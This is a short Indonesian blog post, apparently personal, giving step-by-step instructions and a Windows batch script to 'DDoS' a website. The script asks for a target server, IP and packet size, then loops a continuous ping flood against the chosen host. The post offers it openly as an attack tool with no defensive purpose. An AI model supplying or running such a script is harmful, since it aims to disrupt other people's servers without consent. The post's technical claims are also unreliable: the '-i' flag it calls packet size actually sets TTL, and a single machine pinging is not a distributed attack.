Cara DDoS Website Menggunakan CMD



Bang Zendy -  Cara DDoS Website Dengan Menggunakan CMD , pagi siang sore malam brother and sister hehe kali ini saya mau share Cara DDoS Website Dengan Menggunakan CMD itu sangat mudah b, Kalau belum Tau DDoS Distributed Denial Of Service Kalo ada salah dalam penulisan ya maklum lupa lupa inget wakkwkawkwak...
Oke tanpa banyak basa basi padahal udah banyak si langsung saja ke Cara DDoS Online Menggunakan CMD , berikut step by step nya


  1. Kamu Buka Notepad , accesoris > notepad -_-
  2. Copy Paste Script Dibawah ini.
    @echo off

    mode 67,16
    title DDOS Attack By http://zendyhafitra.blogspot.com/
    color 0b
    cls
    echo.
    echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
    echo DDOS With Batchfile By http://zendyhafitra.blogspot.com/
    echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
    echo.
    set /p x=Server-Target:
    echo.
    echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
    ping %x%
    echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
    @ping.exe 127.0.0.1 -n 5 -w 1000 > nul
    goto Next
    :Next
    echo.
    echo.
    echo.
    set /p m=ip Host:
    echo.
    set /p n=Packet Size:
    echo.
    :DDOS
    color 0d
    echo Attacking Server %m%
    ping %m% -i %n% -t >nul
    goto DDOS
  3. Kemudian Save Menggunakan Extensi .Bat contoh Anying.Bat , DDoS.bat
  4. udah itu buka aja , trus masukin situs yang mau di DDoS
  5. kalo udah kita hajar lagi hehe masukin ip host nya  B| kalo udah masukin IP hostnya biasanya dia minta Packet size tulis aja 100000 atau 10000000 terserah kalian B|
  6. setelah itu akan melakukan DDoS pada ip host yang bersangkutan B| ini ceritaku apa komentarmu

0 komentar:

Poskan Komentar